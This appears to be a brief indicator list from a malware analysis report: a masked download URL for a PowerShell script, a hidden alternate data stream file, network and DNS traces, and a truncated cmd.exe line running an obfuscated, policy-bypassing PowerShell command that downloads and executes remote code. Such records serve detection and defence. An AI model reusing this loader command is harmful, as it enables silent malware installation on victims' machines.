Technical Information
- http://so######idancesystem.com/en/aguu.ps1
- %TEMP%\icon.txt:icon.png
- 'so######idancesystem.com':80
- DNS ASK so######idancesystem.com
- '<SYSTEM32>\cmd.exe' /C ecHo powershell.EXe -ex bYpASs -Nop -w 1 -ec SQBFAFgAKAAoAG4ARQBXAC0ATwBCAGoARQBDAHQAIAAgAE4ARQBUAC4AVwBlAGIAQwBsAGkAZQBOAFQAKQAuAGQAbwBXAG4ATABPAEEAZABzAFQAUgBpAE4AZwAoACcAaAB0AHQAcAA6AC...
- '<SYSTEM32>\cmd.exe' -